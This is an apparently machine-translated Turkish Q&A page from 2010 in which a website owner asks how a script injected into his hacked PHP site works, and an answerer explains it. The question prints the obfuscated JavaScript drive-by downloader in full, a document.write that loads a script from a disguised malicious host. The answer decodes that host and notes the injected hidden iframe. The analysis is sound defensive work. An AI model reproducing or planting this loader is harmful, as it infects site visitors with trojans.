SORU
22 Ocak 2010, Cuma


Bu pisliğe nasıl çalışır?

Benim Cyd! web sitesi sürekli içine girildi. Birisi, bir şekilde, anahtar php komut dosyası içine aşağıdaki çöp enjekte etmeyi başardı, ama Cyd yapılandırma hakkında konuşmak değil. Site çok (bazen bu siteye sadece ziyaretçi olabilirim korkuyorum...) ziyaret etti ve çok siteyi geri yukarı ve çalışan umurumda değil. Sonunda ben hallederim.

Benim soru, nasıl bu saçma işe yarıyor mu? Ben bakmak ve ben sadece bu nasıl bir zararı sürüyor görmüyor musun? Ne bir PDF dosyası ChangeLog adlı yüklemeye çalışır.açtıktan sonra bir trojan ile enfekte olan pdf, Acrobat dondurma makinenize büyük hasara yol olacaktır. Nasıl, bilmiyorum yapar mı, umurumda değil. Ama nasıl komut, aşağıdaki parça indir çağırmak mı?

<script>/*Exception*/ document.write('<script src=' 'h#^(t@)((t$&@p#:)&/!$/)@d$y#^#$n@$d^!!&n#s$)^-$)o^^(r!#g!!#$.^^@g))!a#m#@$e&$s^@@!t@@($!o@$p(.&@c&)@(o$m)).!$m$)y@(b@e()s&$t$@y&o$&(u#)$x&&^(i)-@^c!!&n$#.(@g)$e#(^n&!u(i&#&n(e&(!h&o@&^&l^$(l)&y$(#@w!o@!((o#d&^.^#)r$#^u!!$:(#@&8#)(0$8@&0^(/))s#o#^&#^f!$t$!o##n(&$i(^!c$(.!&c@o!&^m#&/&(s&$(o!f&!t@&o!!n)&i$&c!.#^^c)!$o@@((m@#/$^!g#^o$^&o&#g!l)@@@!e&.))c!)(o#@#^!m(&/^^l#^@i##(v&@e&)!$j^!a@$s#m!i)n$.!$c&$o)@$m^/@$v&i^d^()e(!o&&s@(z(@)^.@)c$&o^m)$)^/#$'.replace(/#|\$|@|\^|&|\(|\)|\!/ig, '') ' defer=defer></scr' 'ipt>');</script>
<!--6f471c20c9b96fed179c85ffdd3365cf-->

ESET Bu kod olarak algıladı/JS TrojanDownloader.Ajan.Casus uydu trojan

CEVAP
22 Ocak 2010, Cuma


replace arama devi dağınık dize sonra dikkat edin: .replace(/#|\$|@|\^|&|\(|\)|\!/ig, '').

Özel karakterlerin çoğu, normal bir URL dönüştürerek ortadan kaldırır:

evil://dyndns-org.gamestop.com.mybestyouxi-cn.genuinehollywood.ru:8080/softonic.com/softonic.com/google.com/livejasmin.com/videosz.com/

(Ben elle evil:) http: değişti

Normal ifade .replace(/[#$@^&()!]/ig, '') basitleştirilmiş olabilir unutmayın

Eğer senaryoyu bakarsanız, aynı etki alanından gizli bir İFRAME yolu /index.php?ys içeren enjekte çok basit bir senaryo göreceksiniz.

Fiddler Bu sayfa rica ettim, ve hiç bir içerik vardı.

Bunu Paylaş:
  • Google+
  • E-Posta
Etiketler:

YORUMLAR

SPONSOR VİDEO

Rastgele Yazarlar

  • ibebrent

    ibebrent

    23 Temmuz 2007
  • Joshua Bane

    Joshua Bane

    24 Temmuz 2007
  • kidrauhl

    kidrauhl

    15 Ocak 2007